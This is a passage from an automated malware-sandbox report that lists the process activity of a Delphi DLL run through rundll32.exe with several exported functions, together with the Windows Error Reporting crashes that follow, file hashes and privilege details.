      Imagebase:0x430000
      File size:61'440 bytes
      MD5 hash:889B99C52A60DD49227C5E485A016679
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:Borland Delphi
      Reputation:high
      Has exited:false

      Target ID:7
      Start time:01:26:32
      Start date:10/12/2024
      Path:C:\Windows\SysWOW64\rundll32.exe
      Wow64 process (32bit):true
      Commandline:rundll32.exe C:\Users\user\Desktop\Y7KU3yvGQ6.dll,TMethodImplementationIntercept
      Imagebase:0x430000
      File size:61'440 bytes
      MD5 hash:889B99C52A60DD49227C5E485A016679
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:Borland Delphi
      Reputation:high
      Has exited:true

      Target ID:11
      Start time:01:26:48
      Start date:10/12/2024
      Path:C:\Windows\SysWOW64\WerFault.exe
      Wow64 process (32bit):true
      Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 6944 -s 776
      Imagebase:0x1d0000
      File size:483'680 bytes
      MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language
      Reputation:high
      Has exited:true

      Target ID:12
      Start time:01:26:50
      Start date:10/12/2024
      Path:C:\Windows\SysWOW64\rundll32.exe
      Wow64 process (32bit):true
      Commandline:rundll32.exe "C:\Users\user\Desktop\Y7KU3yvGQ6.dll",GetInstallDetailsPayload
      Imagebase:0x430000
      File size:61'440 bytes
      MD5 hash:889B99C52A60DD49227C5E485A016679
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:Borland Delphi
      Reputation:high
      Has exited:true

      Target ID:13
      Start time:01:26:50
      Start date:10/12/2024
      Path:C:\Windows\SysWOW64\rundll32.exe
      Wow64 process (32bit):true
      Commandline:rundll32.exe "C:\Users\user\Desktop\Y7KU3yvGQ6.dll",SignalInitializeCrashReporting
      Imagebase:0x430000
      File size:61'440 bytes
      MD5 hash:889B99C52A60DD49227C5E485A016679
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:Borland Delphi
      Reputation:high
      Has exited:true

      Target ID:14
      Start time:01:26:50
      Start date:10/12/2024
      Path:C:\Windows\SysWOW64\rundll32.exe
      Wow64 process (32bit):true
      Commandline:rundll32.exe "C:\Users\user\Desktop\Y7KU3yvGQ6.dll",TMethodImplementationIntercept
      Imagebase:0x430000
      File size:61'440 bytes
      MD5 hash:889B99C52A60DD49227C5E485A016679
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:Borland Delphi
      Has exited:true

      Target ID:15
      Start time:01:26:50
      Start date:10/12/2024
      Path:C:\Windows\SysWOW64\rundll32.exe
      Wow64 process (32bit):true
      Commandline:rundll32.exe "C:\Users\user\Desktop\Y7KU3yvGQ6.dll",dbkFCallWrapperAddr
      Imagebase:0x430000
      File size:61'440 bytes
      MD5 hash:889B99C52A60DD49227C5E485A016679
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:Borland Delphi
      Has exited:true

      Target ID:16
      Start time:01:26:51
      Start date:10/12/2024
      Path:C:\Windows\SysWOW64\rundll32.exe
      Wow64 process (32bit):true
      Commandline:rundll32.exe "C:\Users\user\Desktop\Y7KU3yvGQ6.dll",__dbk_fcall_wrapper
      Imagebase:0x430000
      File size:61'440 bytes
      MD5 hash:889B99C52A60DD49227C5E485A016679
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:Borland Delphi
      Has exited:true

      Target ID:19
      Start time:01:26:55
      Start date:10/12/2024
      Path:C:\Windows\SysWOW64\WerFault.exe
      Wow64 process (32bit):true
      Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 1436 -s 768
      Imagebase:0x1d0000
      File size:483'680 bytes
      MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language
      Has exited:true

      Target ID:21
      Start time:01:27:15
      Start date:10/12/2024
      Path:C:\Windows\SysWOW64\WerFault.exe
      Wow64 process (32bit):true
      Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 6196 -s 768
      Imagebase:0x1d0000
      File size:483'680 bytes
      MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language
      Has exited:true

      Target ID:23
      Start time:01:27:20
      Start date:10/12/2024
      Path:C:\Windows\SysWOW64\WerFault.exe
      Wow64 process (32bit):true
      Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 6748 -s 768
      Imagebase:0x1d0000
      File size:483'680 bytes
      MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language
      Has exited:true

      No disassembly